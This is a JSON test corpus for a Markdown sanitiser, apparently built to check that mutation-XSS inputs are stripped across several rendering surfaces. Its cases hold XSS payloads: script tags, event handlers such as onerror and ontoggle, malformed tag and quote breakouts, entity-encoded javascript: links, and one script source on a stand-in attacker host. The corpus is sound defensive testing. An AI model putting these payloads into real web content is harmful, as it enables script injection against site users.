{
  "$schema": "./markdown-xss-corpus.schema.json",
  "version": 1,
  "seed": 2662026,
  "categories": [
    "raw-event",
    "malformed-separator",
    "entity-control-protocol",
    "dangerous-url",
    "namespace",
    "container-navigation",
    "mutation-serialization",
    "feature-output",
    "resource-boundary"
  ],
  "surfaces": [
    "core-sync",
    "wasm",
    "worker",
    "chunked",
    "ssr-no-dom",
    "initial-render",
    "feature-gateway",
    "browser-dom"
  ],
  "cases": [
    {
      "id": "mxss-raw-script-basic",
      "category": "raw-event",
      "source": "RAW-01 retained\n\n<script>globalThis.__FSUS_XSS__=1</script>",
      "surfaces": ["core-sync", "wasm", "worker", "chunked", "ssr-no-dom", "initial-render", "browser-dom"],
      "invariants": { "forbidSelectors": ["script", "[onload]", "[onerror]"], "forbidExternalUrls": true, "allowedNamespaces": ["http://www.w3.org/1999/xhtml"] },
      "preserve": { "text": ["RAW-01 retained"], "selectors": [] },
      "reviewed": true
    },
    {
      "id": "mxss-raw-img-onerror",
      "category": "raw-event",
      "source": "RAW-02 retained\n\n<img src=x onerror=\"globalThis.__FSUS_XSS__=2\">",
      "surfaces": ["core-sync", "wasm", "worker", "chunked", "ssr-no-dom", "initial-render", "browser-dom"],
      "invariants": { "forbidSelectors": ["script", "[onerror]", "img[src='x']"], "forbidExternalUrls": true, "allowedNamespaces": ["http://www.w3.org/1999/xhtml"] },
      "preserve": { "text": ["RAW-02 retained"], "selectors": [] },
      "reviewed": true
    },
    {
      "id": "mxss-raw-details-ontoggle",
      "category": "raw-event",
      "source": "RAW-03 retained\n\n<details open ontoggle=alert(3)>unsafe</details>",
      "surfaces": ["core-sync", "wasm", "worker", "chunked", "ssr-no-dom", "initial-render", "browser-dom"],
      "invariants": { "forbidSelectors": ["[ontoggle]", "details[open]"], "forbidExternalUrls": true, "allowedNamespaces": ["http://www.w3.org/1999/xhtml"] },
      "preserve": { "text": ["RAW-03 retained"], "selectors": [] },
      "reviewed": true
    },
    {
      "id": "mxss-raw-body-onpageshow",
      "category": "raw-event",
      "source": "RAW-04 retained\n\n<body onpageshow=alert(4)>unsafe</body>",
      "surfaces": ["core-sync", "wasm", "worker", "chunked", "ssr-no-dom", "initial-render", "browser-dom"],
      "invariants": { "forbidSelectors": ["[onpageshow]", "body body"], "forbidExternalUrls": true, "allowedNamespaces": ["http://www.w3.org/1999/xhtml"] },
      "preserve": { "text": ["RAW-04 retained"], "selectors": [] },
      "reviewed": true
    },
    {
      "id": "mxss-raw-input-onfocus",
      "category": "raw-event",
      "source": "RAW-05 retained\n\n<input autofocus onfocus=alert(5)>",
      "surfaces": ["core-sync", "wasm", "worker", "chunked", "ssr-no-dom", "initial-render", "browser-dom"],
      "invariants": { "forbidSelectors": ["[onfocus]", "input[autofocus]"], "forbidExternalUrls": true, "allowedNamespaces": ["http://www.w3.org/1999/xhtml"] },
      "preserve": { "text": ["RAW-05 retained"], "selectors": [] },
      "reviewed": true
    },
    {
      "id": "mxss-raw-video-onerror",
      "category": "raw-event",
      "source": "RAW-06 retained\n\n<video><source src=x onerror=alert(6)></video>",
      "surfaces": ["core-sync", "wasm", "worker", "chunked", "ssr-no-dom", "initial-render", "browser-dom"],
      "invariants": { "forbidSelectors": ["[onerror]", "video", "source"], "forbidExternalUrls": true, "allowedNamespaces": ["http://www.w3.org/1999/xhtml"] },
      "preserve": { "text": ["RAW-06 retained"], "selectors": [] },
      "reviewed": true
    },
    {
      "id": "mxss-raw-marquee-onstart",
      "category": "raw-event",
      "source": "RAW-07 retained\n\n<marquee onstart=alert(7)>unsafe</marquee>",
      "surfaces": ["core-sync", "wasm", "worker", "chunked", "ssr-no-dom", "initial-render", "browser-dom"],
      "invariants": { "forbidSelectors": ["[onstart]", "marquee"], "forbidExternalUrls": true, "allowedNamespaces": ["http://www.w3.org/1999/xhtml"] },
      "preserve": { "text": ["RAW-07 retained"], "selectors": [] },
      "reviewed": true
    },

    {
      "id": "mxss-malformed-unclosed-script",
      "category": "malformed-separator",
      "source": "MAL-01 retained\n\n<script src=//attacker.invalid/x.js",
      "surfaces": ["core-sync", "wasm", "worker", "chunked", "ssr-no-dom", "initial-render", "browser-dom"],
      "invariants": { "forbidSelectors": ["script", "[src*='attacker.invalid']"], "forbidExternalUrls": true, "allowedNamespaces": ["http://www.w3.org/1999/xhtml"] },
      "preserve": { "text": ["MAL-01 retained"], "selectors": [] },
      "reviewed": true
    },
    {
      "id": "mxss-malformed-img-slash",
      "category": "malformed-separator",
      "source": "MAL-02 retained\n\n<img/src=x/onerror=alert(2)>",
      "surfaces": ["core-sync", "wasm", "worker", "chunked", "ssr-no-dom", "initial-render", "browser-dom"],
      "invariants": { "forbidSelectors": ["[onerror]", "img[src='x']"], "forbidExternalUrls": true, "allowedNamespaces": ["http://www.w3.org/1999/xhtml"] },
      "preserve": { "text": ["MAL-02 retained"], "selectors": [] },
      "reviewed": true
    },
    {
      "id": "mxss-malformed-backtick-attribute",
      "category": "malformed-separator",
      "source": "MAL-03 retained\n\n<img src=`x` onerror=alert(3)>",
      "surfaces": ["core-sync", "wasm", "worker", "chunked", "ssr-no-dom", "initial-render", "browser-dom"],
      "invariants": { "forbidSelectors": ["[onerror]", "img"], "forbidExternalUrls": true, "allowedNamespaces": ["http://www.w3.org/1999/xhtml"] },
      "preserve": { "text": ["MAL-03 retained"], "selectors": [] },
      "reviewed": true
    },
    {
      "id": "mxss-malformed-null-tag",
      "category": "malformed-separator",
      "source": "MAL-04 retained\n\n<scr\u0000ipt>alert(4)</scr\u0000ipt>",
      "surfaces": ["core-sync", "wasm", "worker", "chunked", "ssr-no-dom", "initial-render", "browser-dom"],
      "invariants": { "forbidSelectors": ["script", "[onerror]"], "forbidExternalUrls": true, "allowedNamespaces": ["http://www.w3.org/1999/xhtml"] },
      "preserve": { "text": ["MAL-04 retained"], "selectors": [] },
      "reviewed": true
    },
    {
      "id": "mxss-malformed-table-breakout",
      "category": "malformed-separator",
      "source": "MAL-05 retained\n\n<table><tr><td></style><img src=x onerror=alert(5)>",
      "surfaces": ["core-sync", "wasm", "worker", "chunked", "ssr-no-dom", "initial-render", "browser-dom"],
      "invariants": { "forbidSelectors": ["[onerror]", "img[src='x']"], "forbidExternalUrls": true, "allowedNamespaces": ["http://www.w3.org/1999/xhtml"] },
      "preserve": { "text": ["MAL-05 retained"], "selectors": [] },
      "reviewed": true
    },
    {
      "id": "mxss-malformed-quote-breakout",
      "category": "malformed-separator",
      "source": "MAL-06 retained\n\n<a title=\"safe' onmouseover='alert(6)\">link</a>",
      "surfaces": ["core-sync", "wasm", "worker", "chunked", "ssr-no-dom", "initial-render", "browser-dom"],
      "invariants": { "forbidSelectors": ["[onmouseover]"], "forbidExternalUrls": true, "allowedNamespaces": ["http://www.w3.org/1999/xhtml"] },
      "preserve": { "text": ["MAL-06 retained"], "selectors": [] },
      "reviewed": true
    },
    {
      "id": "mxss-malformed-newline-attribute",
      "category": "malformed-separator",
      "source": "MAL-07 retained\n\n<img src=x\nonerror=alert(7)>",
      "surfaces": ["core-sync", "wasm", "worker", "chunked", "ssr-no-dom", "initial-render", "browser-dom"],
      "invariants": { "forbidSelectors": ["[onerror]", "img[src='x']"], "forbidExternalUrls": true, "allowedNamespaces": ["http://www.w3.org/1999/xhtml"] },
      "preserve": { "text": ["MAL-07 retained"], "selectors": [] },
      "reviewed": true
    },

    {
      "id": "mxss-entity-javascript-colon",
      "category": "entity-control-protocol",
      "source": "ENT-01 retained [blocked](java&#x73;cript:alert(1))",
      "surfaces": ["core-sync", "wasm", "worker", "chunked", "ssr-no-dom", "initial-render", "browser-dom"],
      "invariants": { "forbidSelectors": ["a[href*='script:']"], "forbidExternalUrls": true, "allowedNamespaces": ["http://www.w3.org/1999/xhtml"] },
      "preserve": { "text": ["ENT-01 retained", "blocked"], "selectors": [] },
      "reviewed": true
    },
    {
      "id": "mxss-entity-tab-protocol",
      "category": "entity-control-protocol",
      "source": "ENT-02 retained [blocked](java&#9;script:alert(2))",
      "surfaces": ["core-sync", "wasm", "worker", "chunked", "ssr-no-dom", "initial-render", "browser-dom"],
      "invariants": { "forbidSelectors": ["a[href*='script:']"], "forbidExternalUrls": true, "allowedNamespaces": ["http://www.w3.org/1999/xhtml"] },
      "preserve": { "text": ["ENT-02 retained", "blocked"], "selectors": [] },
      "reviewed": true
    },
    {
      "id": "mxss-entity-newline-protocol",
      "category": "entity-control-protocol",
      "source": "ENT-03 retained [blocked](java&#10;script:alert(3))",
      "surfaces": ["core-sync", "wasm", "worker", "chunked", "ssr-no-dom", "initial-render", "browser-dom"],
      "invariants": { "forbidSelectors": ["a[href*='script:']"], "forbidExternalUrls": true, "allowedNamespaces": ["http://www.w3.org/1999/xhtml"] },
      "preserve": { "text": ["ENT-03 retained", "blocked"], "selectors": [] },
      "reviewed": true
    },
    {
      "id": "mxss-entity-double-encoded",
      "category": "entity-control-protocol",
      "source": "ENT-04 retained [blocked](java&amp;#x73;cript:alert(4))",
      "surfaces": ["core-sync", "wasm", "worker", "chunked", "ssr-no-dom", "initial-render", "browser-dom"],
      "invariants": { "forbidSelectors": ["a[href^='javascript:']"], "forbidExternalUrls": true, "allowedNamespaces": ["http://www.w3.org/1999/xhtml"] },
      "preserve": { "text": ["ENT-04 retained", "blocked"], "selectors": [] },